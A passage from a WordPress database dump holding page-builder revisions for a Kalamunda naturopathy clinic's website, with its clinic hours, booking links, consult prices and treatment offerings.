custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_url=\"https://verde-health.au2.cliniko.com/bookings\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 13:09:35','2021-05-27 05:09:35','',27,'https://verdenaturopathy.com.au/?p=211',0,'revision','',0),(265,1,'2021-05-27 21:33:27','2021-05-27 13:33:27','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-27 21:33:27','2021-05-27 13:33:27','',188,'https://verdenaturopathy.com.au/?p=265',0,'revision','',0),(212,1,'2021-05-27 13:10:04','2021-05-27 05:10:04','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_url=\"https://verde-health.au2.cliniko.com/bookings\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-27 13:10:04','2021-05-27 05:10:04','',188,'https://verdenaturopathy.com.au/?p=212',0,'revision','',0),(210,1,'2021-05-27 13:08:02','2021-05-27 05:08:02','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01-large.png\" title_text=\"1-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: 